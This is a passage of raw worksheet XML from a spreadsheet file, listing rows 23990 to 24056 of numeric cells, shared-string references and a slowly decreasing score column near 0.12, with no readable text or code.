    <row r="23990" ht="15.75" customHeight="1">
      <c r="A23990" s="1">
        <v>27928.0</v>
      </c>
      <c r="B23990" s="2">
        <v>2.3783547E7</v>
      </c>
      <c r="C23990" s="2" t="s">
        <v>23118</v>
      </c>
      <c r="D23990" s="2">
        <v>1.0</v>
      </c>
      <c r="E23990" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23990" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="23991" ht="15.75" customHeight="1">
      <c r="A23991" s="1">
        <v>31860.0</v>
      </c>
      <c r="B23991" s="2">
        <v>5279556.0</v>
      </c>
      <c r="C23991" s="2" t="s">
        <v>23119</v>
      </c>
      <c r="D23991" s="2">
        <v>1.0</v>
      </c>
      <c r="E23991" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23991" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="23992" ht="15.75" customHeight="1">
      <c r="A23992" s="1">
        <v>13421.0</v>
      </c>
      <c r="B23992" s="2">
        <v>3.506923E7</v>
      </c>
      <c r="C23992" s="2" t="s">
        <v>23120</v>
      </c>
      <c r="D23992" s="2">
        <v>1.0</v>
      </c>
      <c r="E23992" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23992" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="23993" ht="15.75" customHeight="1">
      <c r="A23993" s="1">
        <v>22040.0</v>
      </c>
      <c r="B23993" s="2">
        <v>3.0206539E7</v>
      </c>
      <c r="C23993" s="2" t="s">
        <v>23121</v>
      </c>
      <c r="D23993" s="2">
        <v>1.0</v>
      </c>
      <c r="E23993" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23993" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="23994" ht="15.75" customHeight="1">
      <c r="A23994" s="1">
        <v>22405.0</v>
      </c>
      <c r="B23994" s="2">
        <v>3.5718306E7</v>
      </c>
      <c r="C23994" s="2" t="s">
        <v>23122</v>
      </c>
      <c r="D23994" s="2">
        <v>1.0</v>
      </c>
      <c r="E23994" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23994" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="23995" ht="15.75" customHeight="1">
      <c r="A23995" s="1">
        <v>25045.0</v>
      </c>
      <c r="B23995" s="2">
        <v>1.2845577E7</v>
      </c>
      <c r="C23995" s="2" t="s">
        <v>23123</v>
      </c>
      <c r="D23995" s="2">
        <v>1.0</v>
      </c>
      <c r="E23995" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23995" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="23996" ht="15.75" customHeight="1">
      <c r="A23996" s="1">
        <v>28519.0</v>
      </c>
      <c r="B23996" s="2">
        <v>2.6756364E7</v>
      </c>
      <c r="C23996" s="2" t="s">
        <v>23124</v>
      </c>
      <c r="D23996" s="2">
        <v>1.0</v>
      </c>
      <c r="E23996" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23996" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="23997" ht="15.75" customHeight="1">
      <c r="A23997" s="1">
        <v>29111.0</v>
      </c>
      <c r="B23997" s="2">
        <v>3.043397E7</v>
      </c>
      <c r="C23997" s="2" t="s">
        <v>23125</v>
      </c>
      <c r="D23997" s="2">
        <v>1.0</v>
      </c>
      <c r="E23997" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23997" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="23998" ht="15.75" customHeight="1">
      <c r="A23998" s="1">
        <v>29850.0</v>
      </c>
      <c r="B23998" s="2">
        <v>3.5718305E7</v>
      </c>
      <c r="C23998" s="2" t="s">
        <v>23126</v>
      </c>
      <c r="D23998" s="2">
        <v>1.0</v>
      </c>
      <c r="E23998" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23998" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="23999" ht="15.75" customHeight="1">
      <c r="A23999" s="1">
        <v>32574.0</v>
      </c>
      <c r="B23999" s="2">
        <v>5769898.0</v>
      </c>
      <c r="C23999" s="2" t="s">
        <v>23127</v>
      </c>
      <c r="D23999" s="2">
        <v>1.0</v>
      </c>
      <c r="E23999" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23999" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="24000" ht="15.75" customHeight="1">
      <c r="A24000" s="1">
        <v>33052.0</v>
      </c>
      <c r="B24000" s="2">
        <v>6785595.0</v>
      </c>
      <c r="C24000" s="2" t="s">
        <v>23053</v>
      </c>
      <c r="D24000" s="2">
        <v>1.0</v>
      </c>
      <c r="E24000" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24000" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="24001" ht="15.75" customHeight="1">
      <c r="A24001" s="1">
        <v>33422.0</v>
      </c>
      <c r="B24001" s="2">
        <v>7766893.0</v>
      </c>
      <c r="C24001" s="2" t="s">
        <v>23051</v>
      </c>
      <c r="D24001" s="2">
        <v>1.0</v>
      </c>
      <c r="E24001" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24001" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="24002" ht="15.75" customHeight="1">
      <c r="A24002" s="1">
        <v>33733.0</v>
      </c>
      <c r="B24002" s="2">
        <v>8531069.0</v>
      </c>
      <c r="C24002" s="2" t="s">
        <v>23053</v>
      </c>
      <c r="D24002" s="2">
        <v>1.0</v>
      </c>
      <c r="E24002" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24002" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="24003" ht="15.75" customHeight="1">
      <c r="A24003" s="1">
        <v>2352.0</v>
      </c>
      <c r="B24003" s="2">
        <v>3.3090669E7</v>
      </c>
      <c r="C24003" s="2" t="s">
        <v>23128</v>
      </c>
      <c r="D24003" s="2">
        <v>1.0</v>
      </c>
      <c r="E24003" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24003" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24004" ht="15.75" customHeight="1">
      <c r="A24004" s="1">
        <v>4454.0</v>
      </c>
      <c r="B24004" s="2">
        <v>4.2409492E7</v>
      </c>
      <c r="C24004" s="2" t="s">
        <v>23129</v>
      </c>
      <c r="D24004" s="2">
        <v>1.0</v>
      </c>
      <c r="E24004" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24004" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24005" ht="15.75" customHeight="1">
      <c r="A24005" s="1">
        <v>5855.0</v>
      </c>
      <c r="B24005" s="2">
        <v>4.6942192E7</v>
      </c>
      <c r="C24005" s="2" t="s">
        <v>23130</v>
      </c>
      <c r="D24005" s="2">
        <v>1.0</v>
      </c>
      <c r="E24005" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24005" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24006" ht="15.75" customHeight="1">
      <c r="A24006" s="1">
        <v>7685.0</v>
      </c>
      <c r="B24006" s="2">
        <v>5.1939528E7</v>
      </c>
      <c r="C24006" s="2" t="s">
        <v>23131</v>
      </c>
      <c r="D24006" s="2">
        <v>1.0</v>
      </c>
      <c r="E24006" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24006" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24007" ht="15.75" customHeight="1">
      <c r="A24007" s="1">
        <v>10352.0</v>
      </c>
      <c r="B24007" s="2">
        <v>7045073.0</v>
      </c>
      <c r="C24007" s="2" t="s">
        <v>23132</v>
      </c>
      <c r="D24007" s="2">
        <v>1.0</v>
      </c>
      <c r="E24007" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24007" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24008" ht="15.75" customHeight="1">
      <c r="A24008" s="1">
        <v>16245.0</v>
      </c>
      <c r="B24008" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C24008" s="2" t="s">
        <v>23133</v>
      </c>
      <c r="D24008" s="2">
        <v>1.0</v>
      </c>
      <c r="E24008" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24008" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24009" ht="15.75" customHeight="1">
      <c r="A24009" s="1">
        <v>19970.0</v>
      </c>
      <c r="B24009" s="2">
        <v>5.7559587E7</v>
      </c>
      <c r="C24009" s="2" t="s">
        <v>23134</v>
      </c>
      <c r="D24009" s="2">
        <v>1.0</v>
      </c>
      <c r="E24009" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24009" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24010" ht="15.75" customHeight="1">
      <c r="A24010" s="1">
        <v>20341.0</v>
      </c>
      <c r="B24010" s="2">
        <v>1.1604849E7</v>
      </c>
      <c r="C24010" s="2" t="s">
        <v>23135</v>
      </c>
      <c r="D24010" s="2">
        <v>1.0</v>
      </c>
      <c r="E24010" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24010" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24011" ht="15.75" customHeight="1">
      <c r="A24011" s="1">
        <v>20396.0</v>
      </c>
      <c r="B24011" s="2">
        <v>1.2123734E7</v>
      </c>
      <c r="C24011" s="2" t="s">
        <v>23136</v>
      </c>
      <c r="D24011" s="2">
        <v>1.0</v>
      </c>
      <c r="E24011" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24011" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24012" ht="15.75" customHeight="1">
      <c r="A24012" s="1">
        <v>20508.0</v>
      </c>
      <c r="B24012" s="2">
        <v>1.3018771E7</v>
      </c>
      <c r="C24012" s="2" t="s">
        <v>23137</v>
      </c>
      <c r="D24012" s="2">
        <v>1.0</v>
      </c>
      <c r="E24012" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24012" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24013" ht="15.75" customHeight="1">
      <c r="A24013" s="1">
        <v>20673.0</v>
      </c>
      <c r="B24013" s="2">
        <v>1.4396181E7</v>
      </c>
      <c r="C24013" s="2" t="s">
        <v>23138</v>
      </c>
      <c r="D24013" s="2">
        <v>1.0</v>
      </c>
      <c r="E24013" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24013" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24014" ht="15.75" customHeight="1">
      <c r="A24014" s="1">
        <v>21400.0</v>
      </c>
      <c r="B24014" s="2">
        <v>2.1815327E7</v>
      </c>
      <c r="C24014" s="2" t="s">
        <v>23139</v>
      </c>
      <c r="D24014" s="2">
        <v>1.0</v>
      </c>
      <c r="E24014" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24014" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24015" ht="15.75" customHeight="1">
      <c r="A24015" s="1">
        <v>22301.0</v>
      </c>
      <c r="B24015" s="2">
        <v>3.3652413E7</v>
      </c>
      <c r="C24015" s="2" t="s">
        <v>23140</v>
      </c>
      <c r="D24015" s="2">
        <v>1.0</v>
      </c>
      <c r="E24015" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24015" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24016" ht="15.75" customHeight="1">
      <c r="A24016" s="1">
        <v>22895.0</v>
      </c>
      <c r="B24016" s="2">
        <v>4.7937818E7</v>
      </c>
      <c r="C24016" s="2" t="s">
        <v>23141</v>
      </c>
      <c r="D24016" s="2">
        <v>1.0</v>
      </c>
      <c r="E24016" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24016" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24017" ht="15.75" customHeight="1">
      <c r="A24017" s="1">
        <v>23305.0</v>
      </c>
      <c r="B24017" s="2">
        <v>5.4095909E7</v>
      </c>
      <c r="C24017" s="2" t="s">
        <v>23142</v>
      </c>
      <c r="D24017" s="2">
        <v>1.0</v>
      </c>
      <c r="E24017" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24017" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24018" ht="15.75" customHeight="1">
      <c r="A24018" s="1">
        <v>23876.0</v>
      </c>
      <c r="B24018" s="2">
        <v>8358117.0</v>
      </c>
      <c r="C24018" s="2" t="s">
        <v>23143</v>
      </c>
      <c r="D24018" s="2">
        <v>1.0</v>
      </c>
      <c r="E24018" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24018" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24019" ht="15.75" customHeight="1">
      <c r="A24019" s="1">
        <v>24828.0</v>
      </c>
      <c r="B24019" s="2">
        <v>1.2123733E7</v>
      </c>
      <c r="C24019" s="2" t="s">
        <v>23136</v>
      </c>
      <c r="D24019" s="2">
        <v>1.0</v>
      </c>
      <c r="E24019" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24019" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24020" ht="15.75" customHeight="1">
      <c r="A24020" s="1">
        <v>24928.0</v>
      </c>
      <c r="B24020" s="2">
        <v>1.24394E7</v>
      </c>
      <c r="C24020" s="2" t="s">
        <v>23144</v>
      </c>
      <c r="D24020" s="2">
        <v>1.0</v>
      </c>
      <c r="E24020" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24020" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24021" ht="15.75" customHeight="1">
      <c r="A24021" s="1">
        <v>25377.0</v>
      </c>
      <c r="B24021" s="2">
        <v>1.3640549E7</v>
      </c>
      <c r="C24021" s="2" t="s">
        <v>23145</v>
      </c>
      <c r="D24021" s="2">
        <v>1.0</v>
      </c>
      <c r="E24021" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24021" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24022" ht="15.75" customHeight="1">
      <c r="A24022" s="1">
        <v>25604.0</v>
      </c>
      <c r="B24022" s="2">
        <v>1.439618E7</v>
      </c>
      <c r="C24022" s="2" t="s">
        <v>23138</v>
      </c>
      <c r="D24022" s="2">
        <v>1.0</v>
      </c>
      <c r="E24022" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24022" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24023" ht="15.75" customHeight="1">
      <c r="A24023" s="1">
        <v>25812.0</v>
      </c>
      <c r="B24023" s="2">
        <v>1.4750188E7</v>
      </c>
      <c r="C24023" s="2" t="s">
        <v>23146</v>
      </c>
      <c r="D24023" s="2">
        <v>1.0</v>
      </c>
      <c r="E24023" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24023" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24024" ht="15.75" customHeight="1">
      <c r="A24024" s="1">
        <v>27310.0</v>
      </c>
      <c r="B24024" s="2">
        <v>2.1366991E7</v>
      </c>
      <c r="C24024" s="2" t="s">
        <v>23147</v>
      </c>
      <c r="D24024" s="2">
        <v>1.0</v>
      </c>
      <c r="E24024" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24024" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24025" ht="15.75" customHeight="1">
      <c r="A24025" s="1">
        <v>29332.0</v>
      </c>
      <c r="B24025" s="2">
        <v>3.133013E7</v>
      </c>
      <c r="C24025" s="2" t="s">
        <v>23148</v>
      </c>
      <c r="D24025" s="2">
        <v>1.0</v>
      </c>
      <c r="E24025" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24025" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24026" ht="15.75" customHeight="1">
      <c r="A24026" s="1">
        <v>29641.0</v>
      </c>
      <c r="B24026" s="2">
        <v>3.3798953E7</v>
      </c>
      <c r="C24026" s="2" t="s">
        <v>23149</v>
      </c>
      <c r="D24026" s="2">
        <v>1.0</v>
      </c>
      <c r="E24026" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24026" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24027" ht="15.75" customHeight="1">
      <c r="A24027" s="1">
        <v>29948.0</v>
      </c>
      <c r="B24027" s="2">
        <v>3607542.0</v>
      </c>
      <c r="C24027" s="2" t="s">
        <v>23150</v>
      </c>
      <c r="D24027" s="2">
        <v>1.0</v>
      </c>
      <c r="E24027" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24027" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24028" ht="15.75" customHeight="1">
      <c r="A24028" s="1">
        <v>31081.0</v>
      </c>
      <c r="B24028" s="2">
        <v>4.8330947E7</v>
      </c>
      <c r="C24028" s="2" t="s">
        <v>23151</v>
      </c>
      <c r="D24028" s="2">
        <v>1.0</v>
      </c>
      <c r="E24028" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24028" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24029" ht="15.75" customHeight="1">
      <c r="A24029" s="1">
        <v>31956.0</v>
      </c>
      <c r="B24029" s="2">
        <v>5310109.0</v>
      </c>
      <c r="C24029" s="2" t="s">
        <v>23146</v>
      </c>
      <c r="D24029" s="2">
        <v>1.0</v>
      </c>
      <c r="E24029" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24029" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24030" ht="15.75" customHeight="1">
      <c r="A24030" s="1">
        <v>32080.0</v>
      </c>
      <c r="B24030" s="2">
        <v>5386563.0</v>
      </c>
      <c r="C24030" s="2" t="s">
        <v>23152</v>
      </c>
      <c r="D24030" s="2">
        <v>1.0</v>
      </c>
      <c r="E24030" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24030" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24031" ht="15.75" customHeight="1">
      <c r="A24031" s="1">
        <v>32157.0</v>
      </c>
      <c r="B24031" s="2">
        <v>5433104.0</v>
      </c>
      <c r="C24031" s="2" t="s">
        <v>23153</v>
      </c>
      <c r="D24031" s="2">
        <v>1.0</v>
      </c>
      <c r="E24031" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24031" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24032" ht="15.75" customHeight="1">
      <c r="A24032" s="1">
        <v>32342.0</v>
      </c>
      <c r="B24032" s="2">
        <v>5591517.0</v>
      </c>
      <c r="C24032" s="2" t="s">
        <v>23154</v>
      </c>
      <c r="D24032" s="2">
        <v>1.0</v>
      </c>
      <c r="E24032" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24032" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24033" ht="15.75" customHeight="1">
      <c r="A24033" s="1">
        <v>33019.0</v>
      </c>
      <c r="B24033" s="2">
        <v>6665179.0</v>
      </c>
      <c r="C24033" s="2" t="s">
        <v>23155</v>
      </c>
      <c r="D24033" s="2">
        <v>1.0</v>
      </c>
      <c r="E24033" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24033" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24034" ht="15.75" customHeight="1">
      <c r="A24034" s="1">
        <v>33314.0</v>
      </c>
      <c r="B24034" s="2">
        <v>7523176.0</v>
      </c>
      <c r="C24034" s="2" t="s">
        <v>23156</v>
      </c>
      <c r="D24034" s="2">
        <v>1.0</v>
      </c>
      <c r="E24034" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24034" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24035" ht="15.75" customHeight="1">
      <c r="A24035" s="1">
        <v>33527.0</v>
      </c>
      <c r="B24035" s="2">
        <v>8115741.0</v>
      </c>
      <c r="C24035" s="2" t="s">
        <v>23157</v>
      </c>
      <c r="D24035" s="2">
        <v>1.0</v>
      </c>
      <c r="E24035" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24035" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24036" ht="15.75" customHeight="1">
      <c r="A24036" s="1">
        <v>33747.0</v>
      </c>
      <c r="B24036" s="2">
        <v>8577658.0</v>
      </c>
      <c r="C24036" s="2" t="s">
        <v>23158</v>
      </c>
      <c r="D24036" s="2">
        <v>1.0</v>
      </c>
      <c r="E24036" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24036" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="24037" ht="15.75" customHeight="1">
      <c r="A24037" s="1">
        <v>31901.0</v>
      </c>
      <c r="B24037" s="2">
        <v>5.2955382E7</v>
      </c>
      <c r="C24037" s="2" t="s">
        <v>23159</v>
      </c>
      <c r="D24037" s="2">
        <v>1.0</v>
      </c>
      <c r="E24037" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24037" s="2">
        <v>0.121141975308642</v>
      </c>
    </row>
    <row r="24038" ht="15.75" customHeight="1">
      <c r="A24038" s="1">
        <v>32023.0</v>
      </c>
      <c r="B24038" s="2">
        <v>5.3568822E7</v>
      </c>
      <c r="C24038" s="2" t="s">
        <v>23160</v>
      </c>
      <c r="D24038" s="2">
        <v>1.0</v>
      </c>
      <c r="E24038" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24038" s="2">
        <v>0.121141975308642</v>
      </c>
    </row>
    <row r="24039" ht="15.75" customHeight="1">
      <c r="A24039" s="1">
        <v>1818.0</v>
      </c>
      <c r="B24039" s="2">
        <v>2.9246976E7</v>
      </c>
      <c r="C24039" s="2" t="s">
        <v>23161</v>
      </c>
      <c r="D24039" s="2">
        <v>1.0</v>
      </c>
      <c r="E24039" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24039" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="24040" ht="15.75" customHeight="1">
      <c r="A24040" s="1">
        <v>21296.0</v>
      </c>
      <c r="B24040" s="2">
        <v>2.0611937E7</v>
      </c>
      <c r="C24040" s="2" t="s">
        <v>22994</v>
      </c>
      <c r="D24040" s="2">
        <v>1.0</v>
      </c>
      <c r="E24040" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24040" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="24041" ht="15.75" customHeight="1">
      <c r="A24041" s="1">
        <v>21758.0</v>
      </c>
      <c r="B24041" s="2">
        <v>2.610564E7</v>
      </c>
      <c r="C24041" s="2" t="s">
        <v>23162</v>
      </c>
      <c r="D24041" s="2">
        <v>1.0</v>
      </c>
      <c r="E24041" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24041" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="24042" ht="15.75" customHeight="1">
      <c r="A24042" s="1">
        <v>30839.0</v>
      </c>
      <c r="B24042" s="2">
        <v>4.5680405E7</v>
      </c>
      <c r="C24042" s="2" t="s">
        <v>23163</v>
      </c>
      <c r="D24042" s="2">
        <v>1.0</v>
      </c>
      <c r="E24042" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24042" s="2">
        <v>0.1206140350877193</v>
      </c>
    </row>
    <row r="24043" ht="15.75" customHeight="1">
      <c r="A24043" s="1">
        <v>29223.0</v>
      </c>
      <c r="B24043" s="2">
        <v>3.0823924E7</v>
      </c>
      <c r="C24043" s="2" t="s">
        <v>23164</v>
      </c>
      <c r="D24043" s="2">
        <v>1.0</v>
      </c>
      <c r="E24043" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24043" s="2">
        <v>0.120545073375262</v>
      </c>
    </row>
    <row r="24044" ht="15.75" customHeight="1">
      <c r="A24044" s="1">
        <v>23344.0</v>
      </c>
      <c r="B24044" s="2">
        <v>5.47547E7</v>
      </c>
      <c r="C24044" s="2" t="s">
        <v>23165</v>
      </c>
      <c r="D24044" s="2">
        <v>1.0</v>
      </c>
      <c r="E24044" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24044" s="2">
        <v>0.1204906204906205</v>
      </c>
    </row>
    <row r="24045" ht="15.75" customHeight="1">
      <c r="A24045" s="1">
        <v>20574.0</v>
      </c>
      <c r="B24045" s="2">
        <v>1.3631144E7</v>
      </c>
      <c r="C24045" s="2" t="s">
        <v>23166</v>
      </c>
      <c r="D24045" s="2">
        <v>1.0</v>
      </c>
      <c r="E24045" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24045" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="24046" ht="15.75" customHeight="1">
      <c r="A24046" s="1">
        <v>25375.0</v>
      </c>
      <c r="B24046" s="2">
        <v>1.3631143E7</v>
      </c>
      <c r="C24046" s="2" t="s">
        <v>23167</v>
      </c>
      <c r="D24046" s="2">
        <v>1.0</v>
      </c>
      <c r="E24046" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24046" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="24047" ht="15.75" customHeight="1">
      <c r="A24047" s="1">
        <v>22022.0</v>
      </c>
      <c r="B24047" s="2">
        <v>3.0094011E7</v>
      </c>
      <c r="C24047" s="2" t="s">
        <v>23168</v>
      </c>
      <c r="D24047" s="2">
        <v>1.0</v>
      </c>
      <c r="E24047" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24047" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="24048" ht="15.75" customHeight="1">
      <c r="A24048" s="1">
        <v>22042.0</v>
      </c>
      <c r="B24048" s="2">
        <v>3.0216693E7</v>
      </c>
      <c r="C24048" s="2" t="s">
        <v>23169</v>
      </c>
      <c r="D24048" s="2">
        <v>1.0</v>
      </c>
      <c r="E24048" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24048" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="24049" ht="15.75" customHeight="1">
      <c r="A24049" s="1">
        <v>4545.0</v>
      </c>
      <c r="B24049" s="2">
        <v>4.2677749E7</v>
      </c>
      <c r="C24049" s="2" t="s">
        <v>23170</v>
      </c>
      <c r="D24049" s="2">
        <v>1.0</v>
      </c>
      <c r="E24049" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24049" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="24050" ht="15.75" customHeight="1">
      <c r="A24050" s="1">
        <v>9906.0</v>
      </c>
      <c r="B24050" s="2">
        <v>5.6781806E7</v>
      </c>
      <c r="C24050" s="2" t="s">
        <v>23171</v>
      </c>
      <c r="D24050" s="2">
        <v>1.0</v>
      </c>
      <c r="E24050" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24050" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="24051" ht="15.75" customHeight="1">
      <c r="A24051" s="1">
        <v>20875.0</v>
      </c>
      <c r="B24051" s="2">
        <v>1.5998662E7</v>
      </c>
      <c r="C24051" s="2" t="s">
        <v>23172</v>
      </c>
      <c r="D24051" s="2">
        <v>1.0</v>
      </c>
      <c r="E24051" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24051" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="24052" ht="15.75" customHeight="1">
      <c r="A24052" s="1">
        <v>21908.0</v>
      </c>
      <c r="B24052" s="2">
        <v>2.8083919E7</v>
      </c>
      <c r="C24052" s="2" t="s">
        <v>23173</v>
      </c>
      <c r="D24052" s="2">
        <v>1.0</v>
      </c>
      <c r="E24052" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24052" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="24053" ht="15.75" customHeight="1">
      <c r="A24053" s="1">
        <v>23356.0</v>
      </c>
      <c r="B24053" s="2">
        <v>5.4941346E7</v>
      </c>
      <c r="C24053" s="2" t="s">
        <v>23174</v>
      </c>
      <c r="D24053" s="2">
        <v>1.0</v>
      </c>
      <c r="E24053" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24053" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="24054" ht="15.75" customHeight="1">
      <c r="A24054" s="1">
        <v>24429.0</v>
      </c>
      <c r="B24054" s="2">
        <v>1.0856036E7</v>
      </c>
      <c r="C24054" s="2" t="s">
        <v>23175</v>
      </c>
      <c r="D24054" s="2">
        <v>1.0</v>
      </c>
      <c r="E24054" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24054" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="24055" ht="15.75" customHeight="1">
      <c r="A24055" s="1">
        <v>26036.0</v>
      </c>
      <c r="B24055" s="2">
        <v>1.5441799E7</v>
      </c>
      <c r="C24055" s="2" t="s">
        <v>23176</v>
      </c>
      <c r="D24055" s="2">
        <v>1.0</v>
      </c>
      <c r="E24055" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24055" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="24056" ht="15.75" customHeight="1">
      <c r="A24056" s="1">
        <v>21287.0</v>
      </c>
      <c r="B24056" s="2">
        <v>2.0460376E7</v>
      </c>
      <c r="C24056" s="2" t="s">
        <v>23177</v>
      </c>
      <c r="D24056" s="2">
        <v>1.0</v>
      </c>
      <c r="E24056" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24056" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="24057" ht="15.75" customHeight="1">
